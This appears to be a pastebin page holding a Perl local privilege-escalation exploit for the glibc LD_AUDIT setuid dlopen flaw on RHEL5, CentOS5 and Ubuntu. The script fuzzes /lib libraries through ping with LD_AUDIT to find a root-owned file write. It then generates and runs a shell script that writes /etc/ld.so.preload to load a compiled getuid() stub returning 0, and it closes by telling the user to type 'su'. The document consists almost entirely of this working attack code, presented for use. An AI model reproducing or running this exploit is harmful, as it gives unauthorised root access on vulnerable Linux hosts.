SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/perl | |
2 | use POSIX; | |
3 | $ptxt=" | |
4 | ||
5 | [The GNU C library dynamic linker will dlopen arbitrary DSOs during setuid loads] | |
6 | [desc: Fuzz and exploit for RHEL5 / CentOS5 / Ubuntu] | |
7 | ||
8 | "; | |
9 | print $ptxt; | |
10 | our $old_fh=select(STDOUT); $|=1; select($old_fh); | |
11 | @libdirs=("/lib"); # you can add your own paths to lib folder here | |
12 | $tempdir="/tmp/fuzz/"; # temp directory | |
13 | mkdir($tempdir); | |
14 | ||
15 | #make some ascii | |
16 | $total=0; | |
17 | foreach $libdir (@libdirs) { | |
18 | opendir(my $dir, $libdir); | |
19 | @lf = readdir($dir); | |
20 | closedir $dir; | |
21 | $total=$total+scalar(@lf)-2; | |
22 | } | |
23 | $step=ceil($total/50); | |
24 | $stepp=0; | |
25 | print "0%"." "x6 ."20%"." "x6 ."40%"." "x6 ."60%"." "x6 ."80%"." "x6 ."100%\n"; | |
26 | print "\["; | |
27 | foreach $libdir (@libdirs) { | |
28 | opendir(my $dir, $libdir); | |
29 | @libfiles = readdir($dir); | |
30 | closedir $dir; | |
31 | foreach $libfile (@libfiles) { | |
32 | $stepp++; | |
33 | if ($stepp==$step) {print ".";$stepp=0;} | |
34 | if (($libfile ne ".") && ($libfile ne "..")) { | |
35 | ||
36 | @dump=`strings $libdir\/$libfile`; | |
37 | foreach $dline (@dump) { | |
38 | if ($dline=~/^([A-Z\_0-9]+)$/) { | |
39 | chomp($dline); | |
40 | $ccc=`LD_AUDIT="$libfile" $dline="$tempdir$libfile-$dline" ping&>/dev/null`; | |
41 | } | |
42 | } | |
43 | } | |
44 | } | |
45 | ||
46 | } | |
47 | print "\]\n"; | |
48 | ||
49 | print "Fuzzing done. Thank you for using!\n"; | |
50 | ||
51 | opendir(my $dir, $tempdir); | |
52 | @fuzzList = readdir($dir); | |
53 | closedir $dir; | |
54 | $libToExploit="";$argToExploit=""; | |
55 | if (scalar(@fuzzList)>2) { | |
56 | foreach $fuzzFile (@fuzzList) { | |
57 | if ($fuzzFile ne "." && $fuzzFile ne "..") { | |
58 | my ($lib,$param)=$fuzzFile=~/(.*)-(.*)/; | |
59 | print "Success: vuln lib - $lib ; arg - $param\n"; | |
60 | if ((-e "$tempdir$fuzzFile") && (!-d "$tempdir$fuzzFile")) { | |
61 | $libToExploit=$lib; | |
62 | $argToExploit=$param; | |
63 | } | |
64 | } | |
65 | } | |
66 | } else { | |
67 | print "Fail. No vuln libs found. Try another target ;)\n"; | |
68 | exit(); | |
69 | } | |
70 | ||
71 | $shCode=qq(#!/bin/sh | |
72 | umask 0 | |
73 | LD_AUDIT=EXP_LIBRARY EXP_ARGUMENT=/etc/ld.so.preload ping | |
74 | echo "[+] creating /tmp/getuid.so" | |
75 | echo "int getuid(){return 0;}" > /tmp/getuid.c | |
76 | gcc -shared /tmp/getuid.c -o /tmp/getuid.so | |
77 | echo "/tmp/getuid.so" > /etc/ld.so.preload | |
78 | ); | |
79 | ||
80 | if ($libToExploit ne "" && $argToExploit ne "") { | |
81 | $shCode=~s/EXP_LIBRARY/$libToExploit/gi; | |
82 | $shCode=~s/EXP_ARGUMENT/$argToExploit/gi; | |
83 | open(SH,">spl.sh"); | |
84 | print SH $shCode; | |
85 | close(SH); | |
86 | chmod(0755,"spl.sh"); | |
87 | system("./spl.sh"); | |
88 | print "Hehe.. Type 'su' and be awesome!\n"; | |
89 | } |